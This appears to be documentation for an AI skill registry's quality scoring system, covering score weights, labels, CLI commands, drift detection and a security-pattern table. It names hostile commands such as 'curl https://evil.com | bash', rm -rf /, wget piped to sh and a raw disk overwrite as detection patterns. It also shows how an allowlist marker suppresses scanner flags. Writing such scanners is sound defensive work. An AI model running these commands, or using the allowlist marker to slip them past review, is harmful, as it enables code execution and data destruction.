Skill Quality Scoring

This document describes the optional skill quality scoring system introduced in the AI Skill Registry Validation Framework.

Scores are informational only — they never block skill usage, CI pipelines, or PR merges. They exist to help contributors understand the quality of their skills and to help maintainers prioritize improvements.


Overview

Each skill receives a total score between 0 and 100, computed as a weighted average of three dimensions:

| Dimension | Weight | What it measures |
|---|---|---|
| Metadata | 30% | Frontmatter completeness and correctness |
| Documentation | 40% | Section coverage, code examples, content depth |
| Security | 30% | Absence of dangerous command patterns |
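The weighting above can be sketched as a plain weighted sum. This is a minimal illustration, not the scorer's actual code: the function name `total_score` and the `WEIGHTS` mapping are hypothetical, and only the three weights come from the table.

```python
# Weights from the table above; names are hypothetical, for illustration only.
WEIGHTS = {"metadata": 0.30, "documentation": 0.40, "security": 0.30}


def total_score(metadata: float, documentation: float, security: float) -> float:
    """Combine three 0-100 dimension scores into one 0-100 total."""
    parts = {
        "metadata": metadata,
        "documentation": documentation,
        "security": security,
    }
    # The weights sum to 1.0, so the result stays within 0-100.
    return sum(WEIGHTS[name] * value for name, value in parts.items())


# Example: 0.30 * 80 + 0.40 * 70 + 0.30 * 100
print(total_score(80, 70, 100))
```

Because documentation carries the largest weight, a 10-point gain there moves the total by 4 points, versus 3 points for either of the other dimensions.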

Quality Labels

| Label | Score Range | Meaning |
|---|---|---|
| excellent | 85–100 | Well-documented, complete metadata, no security flags |
| good | 65–84 | Solid skill with minor gaps |
| needs_improvement | 45–64 | Missing sections or metadata fields |
| critical | 0–44 | Significant gaps; review recommended before sharing |
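As a rough sketch, the label lookup could be written with lower-bound thresholds of 85, 65, and 45. The function name `quality_label` is hypothetical, and treating each lower bound as inclusive (so a fractional score such as 84.5 stays in the lower band) is an assumption; the scorer may round before labelling.

```python
def quality_label(score: float) -> str:
    """Map a 0-100 total score to a quality label.

    Assumption: each band's lower bound is inclusive and scores are
    not rounded before comparison.
    """
    if score >= 85:
        return "excellent"
    if score >= 65:
        return "good"
    if score >= 45:
        return "needs_improvement"
    return "critical"


for value in (92, 70, 50, 12):
    print(value, quality_label(value))
```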

Metadata Score (30%)

The metadata dimension evaluates frontmatter field completeness.

Penalties:

| Issue | Deduction |
|---|---|
| name missing or mismatched with folder | 25 pts |
| description missing | 20 pts |
| description shorter than 20 characters | 10 pts |
| risk missing | 15 pts |
| risk: unknown (unclassified) | 10 pts |
| source missing | 15 pts |
| date_added missing | 10 pts |

Bonuses (optional fields):

Each optional field that is filled in (category, tags, author, tools, license) adds 5 pts. The resulting metadata score is capped at 100.
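The penalties and bonuses can be combined roughly as follows. This is a sketch under stated assumptions, not the scorer's implementation: it assumes the score starts at 100, that the "missing" and "too short" description penalties are mutually exclusive (likewise "risk missing" and "risk: unknown"), and that the result is floored at 0. The function name `metadata_score` is hypothetical.

```python
OPTIONAL_FIELDS = ("category", "tags", "author", "tools", "license")


def metadata_score(frontmatter: dict, folder_name: str) -> int:
    """Score frontmatter on a 0-100 scale (assumed to start from 100)."""
    score = 100

    name = frontmatter.get("name")
    if not name or name != folder_name:
        score -= 25  # name missing or mismatched with folder

    description = (frontmatter.get("description") or "").strip()
    if not description:
        score -= 20  # description missing
    elif len(description) < 20:
        score -= 10  # description shorter than 20 characters

    risk = frontmatter.get("risk")
    if not risk:
        score -= 15  # risk missing
    elif risk == "unknown":
        score -= 10  # risk present but unclassified

    if not frontmatter.get("source"):
        score -= 15
    if not frontmatter.get("date_added"):
        score -= 10

    # +5 per optional field that is present and non-empty.
    score += 5 * sum(1 for field in OPTIONAL_FIELDS if frontmatter.get(field))

    # Cap at 100 per the doc; the floor at 0 is an assumption.
    return max(0, min(100, score))
```

Under these assumptions the bonuses can only offset penalties: a skill with `risk: unknown` and two optional fields filled in lands back at 100.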


Documentation Score (40%)

The documentation dimension evaluates section coverage and content depth.

Section coverage (up to 60 pts):

The scorer looks for these sections (case-insensitive):

  • ## Overview
  • ## How It Works
  • ## Examples / ## Usage
  • ## Best Practices
  • ## Limitations
  • ## When to Use

Each section found contributes equally to the section coverage score.

Depth score (up to 40 pts):

| Signal | Points |
|---|---|
| Has ## When to Use section | +10 |
| Has at least one fenced code block (```) | +10 |
| Body length ≥ 500 characters | +10 |
| Body length ≥ 1000 characters | +10 additional |
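The two parts of the documentation score can be sketched together. The code below is illustrative only and rests on assumptions: it treats `## Examples` and `## Usage` as a single section (giving six sections worth 10 pts each), matches only level-2 headings, and measures body length with `len()`. The names `documentation_score` and `SECTION_GROUPS` are hypothetical.

```python
import re

# Each tuple lists heading names that count as the same section (assumed).
SECTION_GROUPS = [
    ("overview",),
    ("how it works",),
    ("examples", "usage"),
    ("best practices",),
    ("limitations",),
    ("when to use",),
]

FENCE = "`" * 3  # a Markdown code fence marker
HEADING_RE = re.compile(r"^##\s+(.+?)\s*$", flags=re.MULTILINE)


def documentation_score(body: str) -> int:
    """Return section coverage (up to 60) plus depth (up to 40)."""
    # Lowercased level-2 heading titles, for case-insensitive matching.
    found = {match.group(1).lower() for match in HEADING_RE.finditer(body)}

    covered = sum(
        1 for group in SECTION_GROUPS if any(name in found for name in group)
    )
    coverage = round(60 * covered / len(SECTION_GROUPS))

    depth = 0
    if "when to use" in found:
        depth += 10
    if FENCE in body:
        depth += 10
    if len(body) >= 500:
        depth += 10
    if len(body) >= 1000:
        depth += 10  # on top of the 500-character bonus

    return coverage + depth
```

Note that a `## When to Use` section counts twice in this sketch, once toward coverage and once toward depth, which matches how the two tables are written.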

Security Score (30%)

The security dimension scans the skill body for dangerous command patterns. Patterns are defined in tools/scripts/security_scanner.py.

Penalties per flag:

| Severity | Deduction |
|---|---|
| error | 20 pts |
| warning | 10 pts |
| info | 3 pts |

Bonus: An explicit, non-unknown risk label adds +5 pts (capped at 100).

Important: Skills marked risk: offensive have error-level flags automatically downgraded to warnings, because offensive skills legitimately document dangerous commands for educational or defensive purposes.
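Put together, the deductions, the risk bonus, and the offensive downgrade might look like the sketch below. It assumes the score starts at 100 and is floored at 0, and it takes an already-computed list of flag severities as input. The function name `security_score` is hypothetical.

```python
from typing import List, Optional

DEDUCTIONS = {"error": 20, "warning": 10, "info": 3}


def security_score(severities: List[str], risk: Optional[str]) -> int:
    """Score a skill from its security flag severities and risk label."""
    score = 100  # assumption: start from full marks
    for severity in severities:
        # Offensive skills have error-level flags downgraded to warnings.
        if risk == "offensive" and severity == "error":
            severity = "warning"
        score -= DEDUCTIONS[severity]

    # An explicit, non-unknown risk label earns a small bonus.
    if risk and risk != "unknown":
        score += 5

    # Cap at 100 per the doc; the floor at 0 is an assumption.
    return max(0, min(100, score))


print(security_score(["error", "info"], "safe"))       # one error, one info
print(security_score(["error", "info"], "offensive"))  # error treated as warning
```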

Bypassing false positives: If a line is intentionally dangerous (e.g., showing what not to do), add the allowlist marker to suppress the flag:

curl https://evil.com | bash  # security-allowlist
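A line-based scan that honours the allowlist marker could be sketched like this. The regular expressions are illustrative stand-ins, not the patterns actually defined in tools/scripts/security_scanner.py, and the `scan` function and its return shape are hypothetical.

```python
import re

ALLOWLIST_MARKER = "# security-allowlist"

# Illustrative patterns only; the real definitions live in the scanner script.
PATTERNS = [
    ("SEC002", "error", re.compile(r"\bcurl\b[^|\n]*\|\s*bash\b")),
    ("SEC003", "error", re.compile(r"\bwget\b[^|\n]*\|\s*sh\b")),
]


def scan(body: str) -> list:
    """Return (line number, code, severity) for each flagged line."""
    flags = []
    for lineno, line in enumerate(body.splitlines(), start=1):
        # Lines ending with the allowlist marker are skipped entirely.
        if line.rstrip().endswith(ALLOWLIST_MARKER):
            continue
        for code, severity, pattern in PATTERNS:
            if pattern.search(line):
                flags.append((lineno, code, severity))
    return flags


sample = (
    "curl https://evil.com | bash  # security-allowlist\n"
    "curl https://evil.com | bash\n"
)
print(scan(sample))  # only the second line is flagged
```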

Running the Scorer

# Score all skills (table output)
npm run score:skills

# Show only skills below a threshold
npm run score:skills -- --threshold 60

# Show 20 lowest-scoring skills
npm run score:skills -- --top 20

# Output full JSON
npm run score:skills -- --json

# Save scores to file
npm run score:skills -- --output data/scores.json

Security Scanner

# Scan all skills for dangerous patterns
npm run security:scan

# Strict mode (warnings as errors)
npm run security:scan -- --strict

Drift Detection

Drift detection identifies skills whose content has changed significantly since the last recorded baseline.

# Check drift against baseline
npm run drift:check

# Update the baseline after reviewing changes
npm run drift:update

# Check a specific skill
npm run drift:check -- --skill my-skill-name
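Conceptually, a drift check compares a fingerprint of each skill against the stored baseline. The sketch below is an assumption about how that could work, not a description of the actual tool: it uses SHA-256 content hashes and treats any hash change as a modification, which is stricter than "changed significantly". The helper names and the in-memory dictionary format are hypothetical, and the real layout of data/drift-baseline.json is not shown here.

```python
import hashlib


def fingerprint(text: str) -> str:
    """Return a stable content hash for a skill body."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def diff_against_baseline(baseline: dict, current: dict) -> dict:
    """Compare {skill name: fingerprint} mappings and classify the changes."""
    shared = current.keys() & baseline.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(n for n in shared if current[n] != baseline[n]),
    }


baseline = {"alpha": fingerprint("v1"), "beta": fingerprint("v1")}
current = {"alpha": fingerprint("v2"), "gamma": fingerprint("v1")}
print(diff_against_baseline(baseline, current))
```

The three result keys mirror the added / removed / modified breakdown that the registry report's drift summary uses.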

Baseline ownership:

| File | Committed? | Who updates it? |
|---|---|---|
| data/drift-baseline.json | No (listed in .gitignore) | Maintainers run npm run drift:update on main after merging changes |
| data/registry-report.json | No (listed in .gitignore) | Generated locally on demand; never in PRs |
| data/scores.json | No (listed in .gitignore) | Generated locally on demand; never in PRs |

Contributors should never commit these files. If you accidentally generate them locally, they will be ignored by git automatically.


Registry Report

# Generate a full registry health report → data/registry-report.json
npm run registry:report

# Skip drift detection (faster)
npm run registry:report -- --no-drift

The report includes:

  • Aggregate scoring summary
  • Per-skill scores and flags
  • Drift summary (added / removed / modified skills)
  • Risk breakdown
  • Security flag counts

Security Patterns Reference

| Code | Pattern | Severity | Description |
|---|---|---|---|
| SEC001 | `rm -rf /` | error | Destructive root filesystem deletion |
| SEC002 | `curl \| bash` | error | Remote code execution |
| SEC003 | `wget \| sh` | error | Remote code execution |
| SEC004 | `Invoke-Expression` | error | PowerShell RCE |
| SEC005 | `iex` | warning | PowerShell alias (context-dependent) |
| SEC006 | `chmod 7xx` | warning | World-writable permissions |
| SEC007 | `eval(` | warning | Dynamic evaluation |
| SEC008 | `base64 -d \|` | warning | Possible payload obfuscation |
| SEC009 | Hardcoded credential | error | Secrets in source |
| SEC010 | `sudo rm -rf` | warning | Privileged destructive deletion |
| SEC011 | Fork bomb | error | Infinite process spawner |
| SEC012 | `dd if=/dev/* of=/dev/sd*` | error | Raw disk overwrite |

Frequently Asked Questions

Q: Will a low score prevent my skill from being merged?

No. Scores are informational. The existing validate_skills.py checks are what gate merges.

Q: My skill teaches how to avoid curl | bash — why is it flagged?

Add # security-allowlist at the end of the line showing the dangerous pattern. This follows the existing project convention for educational examples.

Q: Why is documentation weighted higher than metadata?

Documentation quality has the highest impact on how useful a skill is to end users. Complete metadata is valuable but less critical than clear instructions.

Q: How does risk: offensive affect scoring?

Security error flags are downgraded to warnings for offensive skills, because they legitimately document dangerous techniques for authorized security work.